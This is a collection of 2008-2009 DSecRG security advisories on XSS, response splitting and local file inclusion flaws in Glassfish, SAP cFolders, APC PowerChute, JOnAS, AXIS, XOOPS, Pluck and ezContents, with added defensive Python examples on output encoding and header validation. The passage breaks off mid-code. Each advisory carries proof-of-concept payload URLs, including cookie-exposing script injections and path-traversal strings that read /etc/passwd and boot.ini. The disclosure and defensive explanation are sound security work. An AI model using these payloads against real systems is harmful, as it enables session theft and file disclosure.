[DSECRG-09-034] Sun Glassfish Enterprise Server - Multiple Linked XSS vulnerabilities
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-034

Original advisory: http://dsecrg.com/pages/vul/show.php?id=134

Application:              Sun Glassfish Enterprise Server
Versions Affected:        2.1
Vendor URL:               https://glassfish.dev.java.net/
Bug:                      Multiple Linked XSS vulnerabilities
Exploits:                 YES
Reported:                 19.03.2009
Vendor response:          20.03.2009
Solution:                 YES
Date of Public Advisory:  05.05.2009
Author:                   Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***********

Glassfish Enterprise Server Admin Console has multiple linked XSS vulnerabilities.

Details
*******

Using these vulnerabilities an attacker can steal the administrator's cookie and then authenticate as administrator or perform certain administrative actions.

1. Multiple Linked XSS vulnerabilities.

Many pages have a typical XSS vulnerability: an attacker can inject script through the URL string.

Example:

http://[server]/applications/applications.jsf?');};alert(DSecRG_XSS);</script><!--
http://[server]/configuration/configuration.jsf?');};alert(DSecRG_XSS);</script><!--
http://[server]/customMBeans/customMBeans.jsf?');};alert(DSecRG_XSS);</script><!--
http://[server]/resourceNode/resources.jsf?');};alert(DSecRG_XSS);</script><!--
http://[server]/sysnet/registration.jsf?');};alert(DSecRG_XSS);</script><!--
http://[server]/webService/webServicesGeneral.jsf?');};alert(DSecRG_XSS);</script><!--

Response HTML code:

#
...
<script type="text/javascript">
var myonload = new Object();
myonload.oldonload = window.onload;
myonload.newonload = function() {
    if ('/applications/applications.jsf?');};alert(DSecRG_XSS);</script><!--' != '') {
...
#

2. Multiple Linked XSS vulnerabilities in the GET parameter name.

Many pages have a typical XSS vulnerability in the GET parameter "name": an attacker can inject script through the URL string.

Example:

http://[server]/configuration/auditModuleEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')>
http://[server]/configuration/httpListenerEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')>&configName=server-config
http://[server]/resourceNode/jdbcResourceEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')>

Solution
********

These security vulnerabilities are fixed in CVS. The following links lead to the commit email messages for all the changes that fix these issues:

https://glassfish.dev.java.net/servlets/ReadMsg?list=cvs&msgNo=29669
https://glassfish.dev.java.net/servlets/ReadMsg?list=cvs&msgNo=29668
https://glassfish.dev.java.net/servlets/ReadMsg?list=cvs&msgNo=29675

Credits
*******

http://www.nabble.com/Re:--DSECRG--Sun-Glassfish-Multiple-Security-Vulnerabilities-p23002524.html

About
*****

Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services, and certification for the ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems, with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.dsec.ru
[DSECRG-09-038] Sun Glassfish Woodstock Project - Linked XSS Vulnerability
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-038

Original advisory: http://dsecrg.com/pages/vul/show.php?id=138

Application:              Sun Glassfish Woodstock Project (part of Glassfish Enterprise Server)
Versions Affected:        4.2
Vendor URL:               https://woodstock.dev.java.net/
Bug:                      Linked XSS Vulnerability
Exploits:                 YES
Reported:                 19.03.2009
Vendor response:          20.03.2009
Solution:                 YES
Date of Public Advisory:  05.05.2009
Author:                   Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***********

Woodstock components are User Interface Components for the web, based on Java Server Faces and AJAX. Woodstock is also part of Glassfish Enterprise Server.

Woodstock has a linked XSS vulnerability in its 404 error page.

Details
*******

Using this vulnerability an attacker can steal the administrator's cookie and then authenticate as administrator or perform certain administrative actions.

An attacker can inject script through the URL string using UTF-7 encoding. Exploiting this issue requires the Auto-Select encoding setting in the browser configuration.

Example:

http://[server]/theme/META-INF/+ACJ-+AD4APB-SCRIPT+AD7-alert(+ACI-DSecRG_XSS+ACI-)+ADz-/SCRIPT+AD7-

Solution
********

This security vulnerability is fixed in CVS. The following link leads to the commit email message for the changes that fix this issue:

https://woodstock.dev.java.net/servlets/ReadMsg?list=cvs&msgNo=4041

Credits
*******

http://www.nabble.com/Re:--DSECRG--Sun-Glassfish-Multiple-Security-Vulnerabilities-p23002524.html

About
*****

Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services, and certification for the ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems, with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.dsec.ru
SAP Cfolders Multiple Linked XSS Vulnerabilities
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-021

Original advisory: http://dsecrg.com/pages/vul/show.php?id=121

Application:              SAP Cfolders (SAP SRM, SAP ECC, SAP Knowledge Management and SAP NetWeaver cRooms (collaboration rooms))
Vendor URL:               http://SAP.com
Bugs:                     Multiple Linked XSS
Risk:                     High
Exploits:                 YES
Reported:                 12.01.2009
Vendor response:          13.01.2009
Patched:                  21.01.2009
Date of Public Advisory:  21.04.2009
Reference:                SAP note 1292875
Author:                   Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

cFolders (Collaboration Folders) is the SAP web-based application for collaborative sharing of information. cFolders is part of a suite of applications powered by SAP® NetWeaver™ that integrate project management, knowledge management and resource management in collaborative inter-enterprise and intra-enterprise environments. cFolders is integrated with SAP ECC, SAP Product Lifecycle Management (PLM), SAP Supplier Relationship Management (SRM), SAP Knowledge Management and SAP NetWeaver™ cRooms (collaboration rooms). Virtual teams can access, view online, subscribe for changes, and redline documents and product information. Partners and suppliers can interact with cFolders in predefined collaborative or competitive scenarios.

Details
*******

Multiple Linked XSS vulnerabilities were found in the SAP Cfolders engine. Any user can create a vulnerable link and steal a user's or administrator's cookie. He can do this using 3 Linked XSS vulnerabilities.

1. Linked XSS found in page col_table_filter.htm. Vulnerable parameter: p_current_role

Example:

https://sapserver/sap/bc/bsp/sap/cfx_rfc_ui/col_table_filter.htm?p_current_role=<IMG/SRC=JaVaScRiPt:alert('DSECRG')>

2. Linked XSS found in page me_ov.htm. Vulnerable parameter: p_current_role

Example:

https://sapserver/sap/bc/bsp/sap/cfx_rfc_ui/me_ov.htm?p_current_role=<IMG/SRC=JaVaScRiPt:alert('DSECRG')>

Fix Information
***************

The issue has been solved. See SAP note 1292875.

References
**********

SAP note 1292875
https://service.sap.com/sap/support/notes/1292875

About
*****

Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services, and certification for the ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems, with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.dsec.ru
SAP Cfolders Multiple Stored XSS Vulnerabilities
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-014

Original advisory: http://dsecrg.com/pages/vul/show.php?id=114

Application:              SAP Cfolders (included in: SAP SRM, SAP ECC, SAP Knowledge Management and SAP NetWeaver cRooms)
Vendor URL:               http://SAP.com
Bugs:                     Multiple Stored XSS
Risk:                     High
Exploits:                 YES
Reported:                 04.12.2008
Vendor response:          05.12.2008
Vulnerability patched:    15.12.2008
Date of Public Advisory:  21.04.2009
Reference:                SAP note 1284360
Author:                   Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

cFolders (Collaboration Folders) is the SAP web-based application for collaborative sharing of information. cFolders is part of a suite of applications powered by SAP NetWeaver that integrate project management, knowledge management and resource management in collaborative inter-enterprise and intra-enterprise environments. cFolders is integrated with SAP ECC, SAP Product Lifecycle Management (PLM), SAP Supplier Relationship Management (SRM), SAP Knowledge Management and SAP NetWeaver cRooms (collaboration rooms). Virtual teams can access, view online, subscribe for changes, and redline documents and product information. Partners and suppliers can interact with cFolders in predefined collaborative or competitive scenarios.

Details
*******

Multiple Stored XSS vulnerabilities were found in the SAP Cfolders engine. A user who is a business partner of the organization can steal the administrator's cookie by inserting JavaScript into the cFolders system. He can do this using 2 Stored XSS vulnerabilities.

The SAP server does not associate session identifiers with the user's IP address or with any other additional data; it authenticates users only by cookies. So any user who can steal the administrator's cookie can use it to authenticate with administrator rights.

1. A user can insert JavaScript code into the site using the link creation option. He can inject JavaScript code into the LINK field on page

https://[site]/sap/bc/bsp/sap/cfx_rfc_ui/hyp_de_create.htm

Example LINK value:

http://test.com; onmouseover=alert(document.cookie)

Then, when the administrator browses the user's folders, the script will execute.

2. The second XSS vulnerability was found in the document upload area. A user can create a document whose file name includes JavaScript code.

Example filename value:

<script>alert()</script>.doc

To do this the user must change the file name in the HTTP request when sending the file upload request. Using this vulnerability the user can steal the cookie as in the first example.

Fix Information
***************

The issue has been solved. See SAP note 1284360.

References
**********

SAP note 1284360
https://service.sap.com/sap/support/notes/1284360

About
*****

Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services, and certification for the ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems, with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.dsec.ru
[DSECRG-09-009] APC PowerChute Network Shutdown's Web Interface - XSS vulnerability
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-009

Link to original advisory: http://www.dsecrg.com/pages/vul/show.php?id=82

Application:              APC PowerChute Network Shutdown's Web Interface
Vendor URL:               http://www.apc.com/
Bug:                      XSS / Response Splitting
Exploits:                 YES
Reported:                 20.10.2008
Vendor Response:          20.10.2008
Vendor Reference:         081020-000796
Solution:                 Use Firewall
Date of Public Advisory:  26.02.2009
Author:                   Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

Linked XSS and Response Splitting vulnerabilities were found in APC PowerChute Network Shutdown's Web Interface.

Details
*******

1. Linked XSS vulnerability found in script /security/applet. Vulnerable parameter: referrer

Example
*******

GET /security/applet?referrer='<img/src=javascript:alert('DSECRG_XSS')>

2. Response Splitting vulnerability found in script contexthelp. Vulnerable parameter: page

Example
*******

GET /contexthelp?page=Foobar?%0d%0aDSECRG_HEADER:testvalue HTTP/1.0

Response:

HTTP/1.0 302 Moved temporarily
Content-Length: 0
Date: Чт, 25 сен 2008 10:47:42 GMT
Server: Acme.Serve/v1.7 of 13nov96
Connection: close
Expires: 0
Cache-Control: no-cache
Content-type: text/html
Location: help/english/Foobar?
DSECRG_HEADER:testvalue
Content-type: text/html

Solution
********

http://nam-en.apc.com/cgi-bin/nam_en.cfg/php/enduser/std_adp.php?p_faqid=9539

A low-risk web interface vulnerability has been discovered in the PowerChute Business Edition Shutdown Agent. This issue is scheduled to be addressed in a release of the application. While the severity of this vulnerability has been determined to be minimal, it is recommended that users continue to ensure the highest level of protection possible through the placement of PowerChute Business Edition behind a firewall.

References
**********

http://nam-en.apc.com/cgi-bin/nam_en.cfg/php/enduser/std_adp.php?p_faqid=9539

About
*****

Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services, and certification for the ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems, with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
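The response-splitting case above is a header built from a query value that is never checked for line terminators: once the percent-decoded CR/LF lands in the Location value, everything after it is parsed by the client as further headers. The Python example below is added here and is not code from DSecRG or from APC's product. It shows the unsafe and the validated way of building that redirect header, and a small parser a defender can run over a captured response to list header names the server never emits. The function names, the expected-header set and the captured response (reconstructed from the advisory's output, minus the Date line) are constructed for this example.

```python
"""HTTP response splitting: validate header values before emitting them.

Added example, not code from the advisory or from the affected product.
It models the /contexthelp redirect described above: a "page" query value
is copied into a Location header. CAPTURED below is constructed to mirror
the advisory's response, with the injected DSECRG_HEADER on its own line.
"""
import re
from urllib.parse import unquote

# Any CR, LF or NUL (raw, or produced by percent-decoding) would end the
# header line and let the request author append headers or a body.
_CTL = re.compile(r"[\r\n\x00]")


class HeaderInjection(ValueError):
    pass


def location_header_unsafe(page):
    """The vulnerable pattern: decoded query value written straight in."""
    return f"Location: help/english/{unquote(page)}"


def location_header_safe(page):
    """Decode, then refuse any value that contains line terminators."""
    decoded = unquote(page)
    if _CTL.search(decoded):
        raise HeaderInjection("CR/LF in redirect target")
    return f"Location: help/english/{decoded}"


def header_names(raw_response):
    """Header names a client would see in raw_response.

    Accepts CRLF or bare LF line endings, as lenient clients do.
    """
    head = re.split(r"\r?\n\r?\n", raw_response, maxsplit=1)[0]
    lines = re.split(r"\r?\n", head)[1:]          # drop the status line
    return [ln.split(":", 1)[0].strip() for ln in lines if ":" in ln]


def injected_headers(raw_response, expected):
    """Detection: header names present that the server is not known to emit."""
    return [h for h in header_names(raw_response) if h not in expected]


# Constructed: the payload quoted in the advisory, percent-encoded as sent.
PAYLOAD = "Foobar?%0d%0aDSECRG_HEADER:testvalue"

# Constructed: the response as the advisory reports it.
CAPTURED = (
    "HTTP/1.0 302 Moved temporarily\r\n"
    "Content-Length: 0\r\n"
    "Server: Acme.Serve/v1.7 of 13nov96\r\n"
    "Connection: close\r\n"
    "Expires: 0\r\n"
    "Cache-Control: no-cache\r\n"
    "Content-type: text/html\r\n"
    "Location: help/english/Foobar?\r\n"
    "DSECRG_HEADER:testvalue\r\n"
    "Content-type: text/html\r\n"
    "\r\n"
)

# Constructed: the header set this server emits on a normal redirect.
EXPECTED_HEADERS = {"Content-Length", "Date", "Server", "Connection",
                    "Expires", "Cache-Control", "Content-type", "Location"}

if __name__ == "__main__":
    print(location_header_unsafe(PAYLOAD).encode())
    print("unexpected headers:", injected_headers(CAPTURED, EXPECTED_HEADERS))
    try:
        location_header_safe(PAYLOAD)
    except HeaderInjection as exc:
        print("rejected:", exc)
```

Rejecting the request is preferable to stripping the CR/LF: a stripped value still redirects somewhere the author did not intend. Modern servlet containers and frameworks refuse control characters in header values themselves, which is the fix the vendor's FAQ defers to a later release.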
[DSECRG-09-008] JOnAS(4.10.3) - Linked XSS Vulnerability
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-008

Link to original advisory: http://www.dsecrg.com/pages/vul/show.php?id=81

Application:              JOnAS (Java Open Application Server)
Versions Affected:        JOnAS (4.10.3) / Apache Tomcat (5.5.26)
Vendor URL:               http://wiki.jonas.objectweb.org/
Bugs:                     Linked XSS
Exploits:                 YES
Reported:                 21.01.2009
Vendor response:          NONE
Second Reported:          29.01.2009
Vendor response:          NONE
Date of Public Advisory:  25.02.2009
Author:                   Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

JOnAS is a leading edge Open Source implementation by OW2 of the Java EE specification.

A Linked XSS vulnerability was found in the JOnAS engine. Using this vulnerability an attacker can steal the administrator's cookie and then authenticate as administrator or perform certain administrative actions.

Details
*******

Linked XSS vulnerabilities were found in script ListMBeanDetails.do. Vulnerable parameter: select.

In the normal case the select parameter looks like this:

select=jonas:j2eeType=EJBModule

When we try to include another variable with the same name, for example like this:

select=jonas:j2eeType=EJBModule,j2eeType=EJBModule

we get an error page telling us that the j2eeType variable is already defined. When we include JavaScript code in the variable name, it appears in the error page:

select=jonas:j2eeType<script>alert()</script>=EJBModule,j2eeType<script>alert()</script>=EJBModule

Example
*******

http://localhost:9000/jonasAdmin/ListMBeanDetails.do?select=jonas%3Aj2eeType<script>alert('DSecRG%20XSS')</script>%3DEJBModule%2Cj2eeType<script>alert('DSecRG%20XSS')</script>%3DEJBModule

Fix Information
***************

No patches available. We did not get any response from the vendor for more than 2 weeks.

About
*****

Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services, and certification for the ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems, with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.dsec.ru

Digital Security Research Group
__
DIGITAL SECURITY
phone:  +7 812 703 1547
        +7 812 430 9130
e-mail: resea...@dsecrg.com
www.dsecrg.com

---
This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed.
---
[DSECRG-09-004] AXIS 70U Network Document Server - Privilege Escalation and XSS
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-004

AXIS 70U Network Document Server - Privilege Escalation and XSS
http://dsecrg.com/pages/vul/show.php?id=60

Application:              AXIS 70U Network Document Server (Web Interface)
Versions Affected:        3.0
Vendor URL:               http://www.axis.com/
Bug:                      Local File Include and Privilege Escalation, Multiple Linked XSS
Exploits:                 YES
Reported:                 20.10.2008
Vendor response:          20.10.2008
Last response:            02.01.2009
Vendor Case ID:           143027
Solution:                 NONE
Date of Public Advisory:  19.01.2009
Authors:                  Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

Vulnerabilities were found in the Web Interface of the AXIS 70U Network Document Server device.

1. Local File Include and Privilege Escalation. A standard user can escalate privileges to administrator.
2. Multiple Linked XSS vulnerabilities.

Details
*******

1. Local File Include and Privilege Escalation.

A Local File Include vulnerability was found in script user/help/help.shtml. A user can include any local file, even from the admin folder.

Example:

http://[server]/user/help/help.shtml?/admin/this_server/this_server.shtml

2. Multiple Linked XSS vulnerabilities

Linked XSS vulnerabilities were found in scripts:

user/help/help.shtml
user/help/general_help_user.shtml

An attacker can inject script through the URL.

Example:

http://[server]/user/help/help.shtml?<script>alert('DSecRG XSS')</script>
http://[server]/user/help/general_help_user.shtml?<script>alert('DSecRG XSS')</script>

Solution
********

The vendor decided that this vulnerability is not critical and there are no patches for this firmware, but may patch the issues in the next firmware release.

Vendor response [13.01.2009]:

We don't see any major vulnerability issues with the current firmware of Axis 70U but we will consider the mentioned issues on the next firmware release.

About
*****

Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services, and certification for the ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems, with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsec [dot] ru
http://www.dsecrg.com
http://www.dsec.ru
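Every XSS advisory above (Glassfish, Woodstock, cFolders, PowerChute, JOnAS and AXIS) reports the same defect: a request value is copied into the response without encoding for the context it lands in. The "linked" XSS of these advisories is what is now called reflected XSS. The Python example below is added here and is not code from DSecRG or from any of the affected products. It shows context-aware output encoding for the two contexts that occur above: a JavaScript string literal inside an inline script (the Glassfish onload check, where `');};` closes the string, the condition and the function) and HTML text (the `name` and `p_current_role` parameters, the JOnAS and AXIS error and help pages). The templates, function names and sample payloads are constructed for the example; the payloads are the ones quoted in the advisories.

```python
"""Context-aware output encoding against reflected ("linked") XSS.

Added example, not code from the advisories or from the affected products.
Two injection contexts from the advisories above are modelled:

  1. a value echoed inside a JavaScript string literal in an inline
     <script> block (the Glassfish admin console onload check), and
  2. a value echoed into HTML text (the "name" GET parameter, the cFolders
     p_current_role parameter, the JOnAS and AXIS error/help pages).

Templates, function names and sample payloads are constructed.
"""
import html
import re

# Characters allowed to stay literal inside a JS string; everything else is
# emitted as \xHH or \uHHHH, so no quote, slash or angle bracket survives.
_JS_SAFE = re.compile(r"[A-Za-z0-9_,. ]")


def js_string_escape(value):
    """Escape value for use inside a single- or double-quoted JS string."""
    out = []
    for ch in value:
        if _JS_SAFE.match(ch):
            out.append(ch)
        elif ord(ch) < 0x100:
            out.append(f"\\x{ord(ch):02x}")
        else:
            out.append(f"\\u{ord(ch):04x}")
    return "".join(out)


def html_escape(value):
    """Escape value for HTML text and quoted attribute contexts."""
    return html.escape(value, quote=True)


def render_onload_check(request_path):
    """Constructed template modelled on the vulnerable Glassfish snippet.

    The original emitted the raw request path between the quotes; here the
    path is JS-string-escaped first, so the literal cannot be terminated.
    """
    return (
        "<script type=\"text/javascript\">\n"
        "var myonload = new Object();\n"
        "myonload.oldonload = window.onload;\n"
        "myonload.newonload = function() {\n"
        f"    if ('{js_string_escape(request_path)}' != '') {{\n"
        "        /* ... */\n"
        "    }\n"
        "};\n"
        "</script>\n"
    )


def render_name_heading(name):
    """HTML text context: the edited object's name shown in a heading."""
    return f"<h1>Edit: {html_escape(name)}</h1>"


def script_block_is_intact(page):
    """True when the inline script still has exactly one open and one close tag.

    A second <script or </script> in the rendered page means the injected
    value escaped the JS string context.
    """
    return page.count("<script") == 1 and page.count("</script>") == 1


# Constructed inputs, taken from the payloads quoted in the advisories.
JS_CONTEXT_PAYLOAD = "/applications/applications.jsf?');};alert(DSecRG_XSS);</script><!--"
HTML_CONTEXT_PAYLOAD = "<IMG SRC=javascript:alert('DSecRG_XSS')>"

if __name__ == "__main__":
    print(render_onload_check(JS_CONTEXT_PAYLOAD))
    print(render_name_heading(HTML_CONTEXT_PAYLOAD))
```

HTML escaping alone would not have fixed the Glassfish case: entities are not decoded inside a `<script>` block, so the JS string context needs its own encoder, and a value that goes into a URL attribute needs a scheme check on top. The UTF-7 variant in the Woodstock advisory is closed by the same encoding plus an explicit `Content-Type: text/html; charset=UTF-8` header, which removes the browser's encoding auto-selection from the picture. Marking the session cookie HttpOnly takes `document.cookie` away from injected script, although it does not stop script from driving administrative actions inside the victim's session.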
Digital Security opens a site of its research center DSec Research Group
Digital Security opens a site of its research center, DSec Research Group [DSecRG], whose main mission is to conduct research into application and system vulnerabilities. The results of this work are then used by the experts of the Digital Security audit department for assessing the security level of information systems with active audit methods and while carrying out penetration tests. Data about the vulnerabilities found by DSecRG experts is published in the SecurityFocus mailing lists and on the Milw0rm.com portal, and is now also available on the DSecRG website (www.dsecrg.com) in the form of advisories and whitepapers.

Digital Security Research Group
__
DIGITAL SECURITY
phone:  +7 812 703 1547
        +7 812 430 9130
e-mail: resea...@dsec.ru
www.dsecrg.com
www.dsec.ru
[DSECRG-08-040] Multiple Local File Include Vulnerabilities in Xoops 2.3.x
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-040

Application:              XOOPS
Versions Affected:        2.3.1
Vendor URL:               http://www.xoops.org/
Bug:                      Multiple Local File Include
Exploits:                 YES
Reported:                 10.11.2008
Vendor response:          10.11.2008
Solution:                 YES
Date of Public Advisory:  08.12.2008
Authors:                  Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

XOOPS has Multiple Local File Include vulnerabilities.

Details
*******

Local File Include vulnerabilities were found in scripts:

xoops_lib/modules/protector/blocks.php
xoops_lib/modules/protector/main.php

Successful exploitation requires that register_globals is enabled.

Code
#
$mytrustdirname = basename( dirname( __FILE__ ) ) ;
$mytrustdirpath = dirname( __FILE__ ) ;

// language files
$language = empty( $xoopsConfig['language'] ) ? 'english' : $xoopsConfig['language'] ;
if( file_exists( "$mydirpath/language/$language/main.php" ) ) {
    // user customized language file (already read by common.php)
    // include_once "$mydirpath/language/$language/main.php" ;
} else if( file_exists( "$mytrustdirpath/language/$language/main.php" ) ) {
    // default language file
    include_once "$mytrustdirpath/language/$language/main.php" ;
...
#

For successful exploitation the first condition of the if..else statement must be false.

Example:

http://[server]/[installdir]/xoops_lib/modules/protector/blocks.php?mydirpath=DSecRG/DSecRG/DSecRG&xoopsConfig[language]=../../../../../../../boot.ini%00
http://[server]/[installdir]/xoops_lib/modules/protector/main.php?mydirpath=DSecRG/DSecRG/DSecRG&xoopsConfig[language]=../../../../../../../boot.ini%00

Solution
********

The vendor fixed this flaw on 26.11.2008.

The XOOPS 2.3.2a Security Release can be downloaded from the SourceForge repository:
https://sourceforge.net/project/showfiles.php?group_id=41586&package_id=153583&release_id=643010

Release notes:
http://www.xoops.org/modules/news/article.php?storyid=4540

About
*****

Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services, and certification for the ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems, with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
[DSECRG-08-039] Local File Include Vulnerability in Pluck CMS 4.5.3
Hello, bugtraq.

Digital Security Research Group [DSecRG] Advisory #DSECRG-08-039

Application:              Pluck CMS
Versions Affected:        4.5.3
Vendor URL:               http://www.pluck-cms.org/
Bug:                      Local File Include
Exploits:                 YES
Reported:                 25.08.2008
Vendor Response:          30.08.2008
Solution:                 YES
Date of Public Advisory:  18.11.2008
Author:                   Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

Pluck CMS has a Local File Include vulnerability.

Details
*******

1. Local File Include vulnerability found in script data/inc/lib/pcltar.lib.php

Successful exploitation requires that register_globals is enabled.

Code
#
if (!isset($g_pcltar_lib_dir))
    $g_pcltar_lib_dir = "lib";
...
$g_pcltar_extension = "php";

if (!defined("PCLERROR_LIB")) {
    include("data/inc/$g_pcltar_lib_dir/pclerror.lib.$g_pcltar_extension");
}
if (!defined("PCLTRACE_LIB")) {
    include("data/inc/$g_pcltar_lib_dir/pcltrace.lib.$g_pcltar_extension");
}
#

Example:

http://[server]/[installdir]/data/inc/lib/pcltar.lib.php?g_pcltar_lib_dir=../../../../../../../../../../../../../etc/passwd%00

Solution
********

The vendor fixed this flaw on 09.08.2008. The new version, Pluck CMS 4.6, can be downloaded here:
http://www.pluck-cms.org/downloads/click.php?id=8

About
*****

Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services, and certification for the ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems, with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
[DSECRG-08-038] Multiple Local File Include Vulnerabilities in ezContents CMS 2.0.3
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-038

Application:              ezContents CMS
Versions Affected:        2.0.3
Application URL:          http://www.ezcontents.org/
Vendor URL:               http://www.visualshapers.com/
Bug:                      Multiple Local File Include
Exploits:                 YES
Reported:                 05.08.2008
Second report:            18.08.2008
Vendor Response:          NONE
Solution:                 NONE
Date of Public Advisory:  25.08.2008
Author:                   Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

ezContents CMS has Multiple Local File Include vulnerabilities.

Details
*******

1. Local File Include vulnerability found in script /module.php. Vulnerable GET parameter: link.

First discovered by Zero_X [http://secunia.com/advisories/10604/]. The vendor fixed the vulnerability in version 2.0.3 by adding verification for this parameter. However, an attacker can still include local files.

Code [line 32-42, 141-145]
#
$GLOBALS["rootdp"] = './';
require_once ($GLOBALS["rootdp"]."include/config.php");
require_once ($GLOBALS["rootdp"]."include/db.php");
require_once ($GLOBALS["rootdp"]."include/session.php");
include_once ($GLOBALS["rootdp"].$GLOBALS["modules_home"]."modfunctions.php");

if ((!isset($HTTP_GET_VARS["ezSID"])) && (isset($HTTP_POST_VARS["ezSID"]))) $HTTP_GET_VARS["ezSID"] = $HTTP_POST_VARS["ezSID"];
if ((!isset($HTTP_GET_VARS["link"])) && (isset($HTTP_POST_VARS["link"]))) $HTTP_GET_VARS["link"] = $HTTP_POST_VARS["link"];
$HTTP_GET_VARS["link"] = str_replace('../', '', $HTTP_GET_VARS["link"]);
...
if (isExternalLink ($HTTP_GET_VARS["link"])) {
    ECHO 'Remote Code Execution Patch Installed on this implementation of ezContents';
} else {
    include($GLOBALS["rootdp"].$HTTP_GET_VARS["link"]);
}
#

The isExternalLink() function in script /include/functions.php checks only for remote inclusion attempts.

Code [line 768-779]
#
function isExternalLink ($linkref) {
    if ( (substr($linkref,0,5) == 'http:') ||
         (substr($linkref,0,6) == 'https:') ||
         (substr($linkref,0,5) == 'file:') ||
         (substr($linkref,0,4) == 'ftp:') ||
         (substr($linkref,0,7) == 'gopher:') ||
         (substr($linkref,0,7) == 'mailto:') ||
         (substr($linkref,0,5) == 'news:') ||
         (substr($linkref,0,7) == 'telnet:') ||
         (substr($linkref,0,5) == 'wais:') ) {
        return True;
    } else {
        return False;
    }
} // isExternalLink
#

Example:

http://[server]/[installdir]/module.php?link=//////////////////////////etc/passwd

2. Local File Include vulnerabilities found in scripts:

/modules/diary/showdiary.php
/modules/diary/showeventlist.php
/modules/gallery/showgallery.php
/modules/reviews/showreviews.php

Successful exploitation requires that register_globals is enabled.

Code [showdiary.php, line 32-45]
#
global $HTTP_SERVER_VARS;
if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||
     (substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||
     (substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {
    require_once('./modules/moduleSec.php');
} else {
    require_once('../moduleSec.php');
}
$GLOBALS["ModuleName"] = 'diary';
if (!isset($GLOBALS["gsLanguage"])) {
    Header("Location: ".$GLOBALS["rootdp"]."module.php?link=".$GLOBALS["modules_home"].$GLOBALS["ModuleRef"]."/showdiary.php");
}
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php");
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");
#

Script /modules/moduleSec.php checks for inclusion attempts.

Code
#
function moduleExternalLink ($linkref) {
    if ($linkref != '') {
        if ( (substr($linkref,0,5) == 'http:') ||
             (substr($linkref,0,6) == 'https:') ||
             (substr($linkref,0,5) == 'file:') ||
             (substr($linkref,0,4) == 'ftp:') ||
             (substr($linkref,0,7) == 'gopher:') ||
             (substr($linkref,0,7) == 'mailto:') ||
             (substr($linkref,0,5) == 'news:') ||
